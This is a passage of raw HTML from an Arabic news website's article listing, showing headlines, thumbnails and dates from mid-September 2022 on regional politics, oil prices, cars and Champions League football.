				<div class="term-badges floated"><span class="term-badge term-17579"><a href="https://mustaqila.com/egy/">اخبار مصر</a></span></div>				<a  title="لسه الاوان تجمع محمد سرور ولايف ستايلز ستوديوز" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/thumbnail-2-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;thumbnail-2-210x136.jpg&quot;,&quot;279&quot;:&quot;thumbnail-2-279x220.jpg&quot;,&quot;357&quot;:&quot;thumbnail-2-357x210.jpg&quot;,&quot;750&quot;:&quot;thumbnail-2-750x430.jpg&quot;,&quot;1080&quot;:&quot;thumbnail-2.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%84%d8%b3%d9%87-%d8%a7%d9%84%d8%a7%d9%88%d8%a7%d9%86-%d8%aa%d8%ac%d9%85%d8%b9-%d9%85%d8%ad%d9%85%d8%af-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d9%84%d8%a7%d9%8a%d9%81-%d8%b3%d8%aa%d8%a7%d9%8a%d9%84%d8%b2/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%84%d8%b3%d9%87-%d8%a7%d9%84%d8%a7%d9%88%d8%a7%d9%86-%d8%aa%d8%ac%d9%85%d8%b9-%d9%85%d8%ad%d9%85%d8%af-%d8%b3%d8%b1%d9%88%d8%b1-%d9%88%d9%84%d8%a7%d9%8a%d9%81-%d8%b3%d8%aa%d8%a7%d9%8a%d9%84%d8%b2/" class="post-title post-url">
			لسه الاوان تجمع محمد سرور ولايف ستايلز ستوديوز		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T12:52:06+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517454 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/6321eb3042360418e005130d-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;6321eb3042360418e005130d-210x136.jpg&quot;,&quot;279&quot;:&quot;6321eb3042360418e005130d-279x220.jpg&quot;,&quot;357&quot;:&quot;6321eb3042360418e005130d-357x210.jpg&quot;,&quot;750&quot;:&quot;6321eb3042360418e005130d-750x430.jpg&quot;,&quot;768&quot;:&quot;6321eb3042360418e005130d.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%b4%d9%81%d8%b1%d9%88%d9%84%d9%8a%d9%87-%d8%aa%d9%86%d9%88%d9%8a-%d8%b7%d8%b1%d8%ad-%d8%b3%d9%8a%d8%a7%d8%b1%d8%a9-monza-%d9%84%d9%85%d9%86%d8%a7%d9%81%d8%b3%d8%a9-camry-%d9%85%d9%86-%d8%aa%d9%88/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%b4%d9%81%d8%b1%d9%88%d9%84%d9%8a%d9%87-%d8%aa%d9%86%d9%88%d9%8a-%d8%b7%d8%b1%d8%ad-%d8%b3%d9%8a%d8%a7%d8%b1%d8%a9-monza-%d9%84%d9%85%d9%86%d8%a7%d9%81%d8%b3%d8%a9-camry-%d9%85%d9%86-%d8%aa%d9%88/" class="post-title post-url">
			شفروليه تنوي طرح سيارة Monza لمنافسة Camry من تويوتا		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T09:35:36+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517444 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/oil-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;oil-210x136.jpg&quot;,&quot;279&quot;:&quot;oil-279x220.jpg&quot;,&quot;357&quot;:&quot;oil-357x210.jpg&quot;,&quot;750&quot;:&quot;oil-750x430.jpg&quot;,&quot;1194&quot;:&quot;oil.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a7%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d9%86%d9%81%d8%b7-%d8%a8%d8%b3%d8%a8%d8%a8-%d8%aa%d9%88%d9%82%d9%81-%d9%88%d8%b4%d9%8a%d9%83-%d9%84%d9%84%d8%b3%d9%83/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a7%d8%b1%d8%aa%d9%81%d8%a7%d8%b9-%d8%a7%d8%b3%d8%b9%d8%a7%d8%b1-%d8%a7%d9%84%d9%86%d9%81%d8%b7-%d8%a8%d8%b3%d8%a8%d8%a8-%d8%aa%d9%88%d9%82%d9%81-%d9%88%d8%b4%d9%8a%d9%83-%d9%84%d9%84%d8%b3%d9%83/" class="post-title post-url">
			ارتفاع اسعار النفط بسبب توقف وشيك للسكك الحديدية في امريكا		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T09:31:51+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517450 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-21593 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-21593"><a href="https://mustaqila.com/jordan/">اخبار الاردن</a></span></div>				<a  title="ماكرون والعاهل الاردني يدعوان لعقد مؤتمر عاجل حول الشرق الأوسط" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/632271a34236040a6352fc45-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;632271a34236040a6352fc45-210x136.jpg&quot;,&quot;279&quot;:&quot;632271a34236040a6352fc45-279x220.jpg&quot;,&quot;357&quot;:&quot;632271a34236040a6352fc45-357x210.jpg&quot;,&quot;750&quot;:&quot;632271a34236040a6352fc45-750x430.jpg&quot;,&quot;768&quot;:&quot;632271a34236040a6352fc45.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%85%d8%a7%d9%83%d8%b1%d9%88%d9%86-%d9%88%d8%a7%d9%84%d8%b9%d8%a7%d9%87%d9%84-%d8%a7%d9%84%d8%a7%d8%b1%d8%af%d9%86%d9%8a-%d9%8a%d8%af%d8%b9%d9%88%d8%a7%d9%86-%d9%84%d8%b9%d9%82%d8%af-%d9%85%d8%a4/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%85%d8%a7%d9%83%d8%b1%d9%88%d9%86-%d9%88%d8%a7%d9%84%d8%b9%d8%a7%d9%87%d9%84-%d8%a7%d9%84%d8%a7%d8%b1%d8%af%d9%86%d9%8a-%d9%8a%d8%af%d8%b9%d9%88%d8%a7%d9%86-%d9%84%d8%b9%d9%82%d8%af-%d9%85%d8%a4/" class="post-title post-url">
			ماكرون والعاهل الاردني يدعوان لعقد مؤتمر عاجل حول الشرق الأوسط		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T09:30:00+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517447 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="وزير الدفاع الامريكي : نعتزم حماية اليابان من التهديدات المحتملة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/1607401835241.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;1607401835241-210x136.jpg&quot;,&quot;279&quot;:&quot;1607401835241-279x220.jpg&quot;,&quot;357&quot;:&quot;1607401835241-357x210.jpg&quot;,&quot;685&quot;:&quot;1607401835241.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%88%d8%b2%d9%8a%d8%b1-%d8%a7%d9%84%d8%af%d9%81%d8%a7%d8%b9-%d8%a7%d9%84%d8%a7%d9%85%d8%b1%d9%8a%d9%83%d9%8a-%d9%86%d8%b9%d8%aa%d8%b2%d9%85-%d8%ad%d9%85%d8%a7%d9%8a%d8%a9-%d8%a7%d9%84%d9%8a%d8%a7/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%88%d8%b2%d9%8a%d8%b1-%d8%a7%d9%84%d8%af%d9%81%d8%a7%d8%b9-%d8%a7%d9%84%d8%a7%d9%85%d8%b1%d9%8a%d9%83%d9%8a-%d9%86%d8%b9%d8%aa%d8%b2%d9%85-%d8%ad%d9%85%d8%a7%d9%8a%d8%a9-%d8%a7%d9%84%d9%8a%d8%a7/" class="post-title post-url">
			وزير الدفاع الامريكي : نعتزم حماية اليابان من التهديدات المحتملة		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T09:28:29+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
<div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab">	<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517440 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="مانشستر سيتي ينُجز مهمة دورتموند بنجاح في ليلة تألق هالاند" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/469E138C-6D76-4A57-A9E4-713858799459-750x430.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-210x136.jpeg&quot;,&quot;279&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-279x220.jpeg&quot;,&quot;357&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-357x210.jpeg&quot;,&quot;750&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-750x430.jpeg&quot;,&quot;2048&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%85%d8%a7%d9%86%d8%b4%d8%b3%d8%aa%d8%b1-%d8%b3%d9%8a%d8%aa%d9%8a-%d9%8a%d9%86%d9%8f%d8%ac%d8%b2-%d9%85%d9%87%d9%85%d8%a9-%d8%af%d9%88%d8%b1%d8%aa%d9%85%d9%88%d9%86%d8%af-%d8%a8%d9%86%d8%ac%d8%a7/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%85%d8%a7%d9%86%d8%b4%d8%b3%d8%aa%d8%b1-%d8%b3%d9%8a%d8%aa%d9%8a-%d9%8a%d9%86%d9%8f%d8%ac%d8%b2-%d9%85%d9%87%d9%85%d8%a9-%d8%af%d9%88%d8%b1%d8%aa%d9%85%d9%88%d9%86%d8%af-%d8%a8%d9%86%d8%ac%d8%a7/" class="post-title post-url">
			مانشستر سيتي ينُجز مهمة دورتموند بنجاح في ليلة تألق هالاند		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T00:08:53+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	</div>
	</div>
	<div class="wpb_text_column wpb_content_element  bs-vc-block" >
		<div class="wpb_wrapper">
			<div id="jubna26098"></div>
<p></p>

		</div>
	</div>
</div></div></div></div><div class="row vc_row wpb_row vc_row-fluid"><div class="bs-vc-wrapper"><div class="wpb_column bs-vc-column vc_column_container vc_col-sm-12 vc_hidden-md vc_hidden-sm vc_hidden-xs"><div class="bs-vc-wrapper wpb_wrapper"><div class=" bs-hidden-lg bs-listing bs-listing-listing-classic-2 bs-listing-single-tab pagination-animate">		<div class="bs-pagination-wrapper main-term-none infinity bs-slider-first-item">
			<div class="listing listing-classic listing-classic-2 clearfix  columns-1">
		<div class="post-517440 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="مانشستر سيتي ينُجز مهمة دورتموند بنجاح في ليلة تألق هالاند" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/469E138C-6D76-4A57-A9E4-713858799459-750x430.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-210x136.jpeg&quot;,&quot;279&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-279x220.jpeg&quot;,&quot;357&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-357x210.jpeg&quot;,&quot;750&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459-750x430.jpeg&quot;,&quot;2048&quot;:&quot;469E138C-6D76-4A57-A9E4-713858799459.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%85%d8%a7%d9%86%d8%b4%d8%b3%d8%aa%d8%b1-%d8%b3%d9%8a%d8%aa%d9%8a-%d9%8a%d9%86%d9%8f%d8%ac%d8%b2-%d9%85%d9%87%d9%85%d8%a9-%d8%af%d9%88%d8%b1%d8%aa%d9%85%d9%88%d9%86%d8%af-%d8%a8%d9%86%d8%ac%d8%a7/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%85%d8%a7%d9%86%d8%b4%d8%b3%d8%aa%d8%b1-%d8%b3%d9%8a%d8%aa%d9%8a-%d9%8a%d9%86%d9%8f%d8%ac%d8%b2-%d9%85%d9%87%d9%85%d8%a9-%d8%af%d9%88%d8%b1%d8%aa%d9%85%d9%88%d9%86%d8%af-%d8%a8%d9%86%d8%ac%d8%a7/" class="post-title post-url">
			مانشستر سيتي ينُجز مهمة دورتموند بنجاح في ليلة تألق هالاند		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T00:08:53+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517437 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="ثنائية فالفيردي وأسينسيو تقود ريال مدريد للانتصار على لايبزيج في دوري الأبطال" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-750x430.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-210x136.jpeg&quot;,&quot;279&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-279x220.jpeg&quot;,&quot;357&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-357x210.jpeg&quot;,&quot;750&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7-750x430.jpeg&quot;,&quot;1080&quot;:&quot;F5DD01E6-A5F0-4474-BC69-D1CE0AF703E7.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%ab%d9%86%d8%a7%d8%a6%d9%8a%d8%a9-%d9%81%d8%a7%d9%84%d9%81%d9%8a%d8%b1%d8%af%d9%8a-%d9%88%d8%a3%d8%b3%d9%8a%d9%86%d8%b3%d9%8a%d9%88-%d8%aa%d9%82%d9%88%d8%af-%d8%b1%d9%8a%d8%a7%d9%84-%d9%85%d8%af/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%ab%d9%86%d8%a7%d8%a6%d9%8a%d8%a9-%d9%81%d8%a7%d9%84%d9%81%d9%8a%d8%b1%d8%af%d9%8a-%d9%88%d8%a3%d8%b3%d9%8a%d9%86%d8%b3%d9%8a%d9%88-%d8%aa%d9%82%d9%88%d8%af-%d8%b1%d9%8a%d8%a7%d9%84-%d9%85%d8%af/" class="post-title post-url">
			ثنائية فالفيردي وأسينسيو تقود ريال مدريد للانتصار على لايبزيج في دوري الأبطال		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-15T00:06:42+03:00">سبتمبر 15, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517431 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-16487 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-16487"><a href="https://mustaqila.com/iq/">اخبار العراق</a></span></div>				<a  title="نائب يشن هجوما لاذعا على التجربة الامريكية في العراق" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/13312019_5a0f03c97df1a.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;13312019_5a0f03c97df1a-210x136.jpg&quot;,&quot;279&quot;:&quot;13312019_5a0f03c97df1a-279x220.jpg&quot;,&quot;357&quot;:&quot;13312019_5a0f03c97df1a-357x210.jpg&quot;,&quot;500&quot;:&quot;13312019_5a0f03c97df1a.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%86%d8%a7%d8%a6%d8%a8-%d9%8a%d8%b4%d9%86-%d9%87%d8%ac%d9%88%d9%85%d8%a7-%d9%84%d8%a7%d8%b0%d8%b9%d8%a7-%d8%b9%d9%84%d9%89-%d8%a7%d9%84%d8%aa%d8%ac%d8%b1%d8%a8%d8%a9-%d8%a7%d9%84%d8%a7%d9%85%d8%b1/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%86%d8%a7%d8%a6%d8%a8-%d9%8a%d8%b4%d9%86-%d9%87%d8%ac%d9%88%d9%85%d8%a7-%d9%84%d8%a7%d8%b0%d8%b9%d8%a7-%d8%b9%d9%84%d9%89-%d8%a7%d9%84%d8%aa%d8%ac%d8%b1%d8%a8%d8%a9-%d8%a7%d9%84%d8%a7%d9%85%d8%b1/" class="post-title post-url">
			نائب يشن هجوما لاذعا على التجربة الامريكية في العراق		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T22:07:13+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517428 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="أرمينيا تحذر من احتمالية تحول الأزمة مع اذربيجان إلى حرب" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/1663044602714-750x430.jpeg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;1663044602714-210x136.jpeg&quot;,&quot;279&quot;:&quot;1663044602714-279x220.jpeg&quot;,&quot;357&quot;:&quot;1663044602714-357x210.jpeg&quot;,&quot;750&quot;:&quot;1663044602714-750x430.jpeg&quot;,&quot;952&quot;:&quot;1663044602714.jpeg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d8%a3%d8%b1%d9%85%d9%8a%d9%86%d9%8a%d8%a7-%d8%aa%d8%ad%d8%b0%d8%b1-%d9%85%d9%86-%d8%a7%d8%ad%d8%aa%d9%85%d8%a7%d9%84%d9%8a%d8%a9-%d8%aa%d8%ad%d9%88%d9%84-%d8%a7%d9%84%d8%a3%d8%b2%d9%85%d8%a9-%d9%85/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d8%a3%d8%b1%d9%85%d9%8a%d9%86%d9%8a%d8%a7-%d8%aa%d8%ad%d8%b0%d8%b1-%d9%85%d9%86-%d8%a7%d8%ad%d8%aa%d9%85%d8%a7%d9%84%d9%8a%d8%a9-%d8%aa%d8%ad%d9%88%d9%84-%d8%a7%d9%84%d8%a3%d8%b2%d9%85%d8%a9-%d9%85/" class="post-title post-url">
			أرمينيا تحذر من احتمالية تحول الأزمة مع اذربيجان إلى حرب		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T21:22:03+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517425 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-16487 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-16487"><a href="https://mustaqila.com/iq/">اخبار العراق</a></span></div>				<a  title="(نَرْدُ النَصِّ) قصيدة طويلة واحدة بـ 1380 صفحة" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/نرد-النص-كامل--750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;\u0646\u0631\u062f-\u0627\u0644\u0646\u0635-\u0643\u0627\u0645\u0644--210x136.jpg&quot;,&quot;279&quot;:&quot;\u0646\u0631\u062f-\u0627\u0644\u0646\u0635-\u0643\u0627\u0645\u0644--279x220.jpg&quot;,&quot;357&quot;:&quot;\u0646\u0631\u062f-\u0627\u0644\u0646\u0635-\u0643\u0627\u0645\u0644--357x210.jpg&quot;,&quot;750&quot;:&quot;\u0646\u0631\u062f-\u0627\u0644\u0646\u0635-\u0643\u0627\u0645\u0644--750x430.jpg&quot;,&quot;1024&quot;:&quot;\u0646\u0631\u062f-\u0627\u0644\u0646\u0635-\u0643\u0627\u0645\u0644-.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%86%d9%8e%d8%b1%d9%92%d8%af%d9%8f-%d8%a7%d9%84%d9%86%d9%8e%d8%b5%d9%91%d9%90-%d9%82%d8%b5%d9%8a%d8%af%d8%a9-%d8%b7%d9%88%d9%8a%d9%84%d8%a9-%d9%88%d8%a7%d8%ad%d8%af%d8%a9-%d8%a8%d9%80-1380-%d8%b5/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%86%d9%8e%d8%b1%d9%92%d8%af%d9%8f-%d8%a7%d9%84%d9%86%d9%8e%d8%b5%d9%91%d9%90-%d9%82%d8%b5%d9%8a%d8%af%d8%a9-%d8%b7%d9%88%d9%8a%d9%84%d8%a9-%d9%88%d8%a7%d8%ad%d8%af%d8%a9-%d8%a8%d9%80-1380-%d8%b5/" class="post-title post-url">
			(نَرْدُ النَصِّ) قصيدة طويلة واحدة بـ 1380 صفحة		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T21:15:34+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517422 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-83 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
				<div class="term-badges floated"><span class="term-badge term-83"><a href="https://mustaqila.com/last/">اخر الاخبار</a></span></div>				<a  title="مدير منظمة الصحة العالمية يتوقع نهاية قريبة لفيروس كورونا" data-src="https://www.mustaqila.com/wp-content/uploads/?i=/2022/09/w1280-p4x3-2021-12-20T155343Z_2024557007_RC2FIR9DOKAK_RTRMADP_3_HEALTH-CORONAVIRUS-WHO-750x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/www.mustaqila.com\/wp-content\/uploads\/?i=\/2022\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;w1280-p4x3-2021-12-20T155343Z_2024557007_RC2FIR9DOKAK_RTRMADP_3_HEALTH-CORONAVIRUS-WHO-210x136.jpg&quot;,&quot;279&quot;:&quot;w1280-p4x3-2021-12-20T155343Z_2024557007_RC2FIR9DOKAK_RTRMADP_3_HEALTH-CORONAVIRUS-WHO-279x220.jpg&quot;,&quot;357&quot;:&quot;w1280-p4x3-2021-12-20T155343Z_2024557007_RC2FIR9DOKAK_RTRMADP_3_HEALTH-CORONAVIRUS-WHO-357x210.jpg&quot;,&quot;750&quot;:&quot;w1280-p4x3-2021-12-20T155343Z_2024557007_RC2FIR9DOKAK_RTRMADP_3_HEALTH-CORONAVIRUS-WHO-750x430.jpg&quot;,&quot;1280&quot;:&quot;w1280-p4x3-2021-12-20T155343Z_2024557007_RC2FIR9DOKAK_RTRMADP_3_HEALTH-CORONAVIRUS-WHO.jpg&quot;}}"						class="img-holder" href="https://mustaqila.com/%d9%85%d8%af%d9%8a%d8%b1-%d9%85%d9%86%d8%b8%d9%85%d8%a9-%d8%a7%d9%84%d8%b5%d8%ad%d8%a9-%d8%a7%d9%84%d8%b9%d8%a7%d9%84%d9%85%d9%8a%d8%a9-%d9%8a%d8%aa%d9%88%d9%82%d8%b9-%d9%86%d9%87%d8%a7%d9%8a%d8%a9/"></a>
							</div>
		<p class="title">		<a href="https://mustaqila.com/%d9%85%d8%af%d9%8a%d8%b1-%d9%85%d9%86%d8%b8%d9%85%d8%a9-%d8%a7%d9%84%d8%b5%d8%ad%d8%a9-%d8%a7%d9%84%d8%b9%d8%a7%d9%84%d9%85%d9%8a%d8%a9-%d9%8a%d8%aa%d9%88%d9%82%d8%b9-%d9%86%d9%87%d8%a7%d9%8a%d8%a9/" class="post-title post-url">
			مدير منظمة الصحة العالمية يتوقع نهاية قريبة لفيروس كورونا		</a>
		</p>		<div class="post-meta">

							<span class="time"><time class="post-published updated"
				                         datetime="2022-09-14T20:51:27+03:00">سبتمبر 14, 2022</time></span>
						</div>
					</div>
	</div >
	<div class="post-517418 type-post format-standard has-post-thumbnail   listing-item listing-item-classic listing-item-classic-2  main-term-16487 bsw-11 ">
	<div class="listing-inner item-inner">
					<div class="featured clearfix">
